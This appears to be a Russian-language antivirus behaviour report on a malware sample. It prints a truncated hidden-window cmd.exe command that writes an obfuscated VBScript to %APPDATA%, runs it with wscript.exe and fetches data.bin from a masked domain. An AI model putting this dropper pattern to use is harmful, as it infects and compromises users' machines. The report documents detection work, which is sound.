Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "YxZlDA=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm WHs" "FUnction Aoz(UJGhE,Yayp)" "QC=69" "diM MuIV,Jwhrx8,TxL,AcbJ80,Txghk(5)" "WbM2au=22" "Txghk(0)=104" "Dds=7" "Txghk(1)=100" "K0...
- %APPDATA%\15843.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\15843.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "YxZlDA=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm WHs" "FUnction Aoz(UJGhE,Yayp)" "QC=69" "diM MuIV,Jwhrx8,TxL,AcbJ80,Txghk(5)" "WbM2au=22" "Txghk(0)=104" "Dds=7" "Txghk(1)=100" "K0...' (со скрытым окном)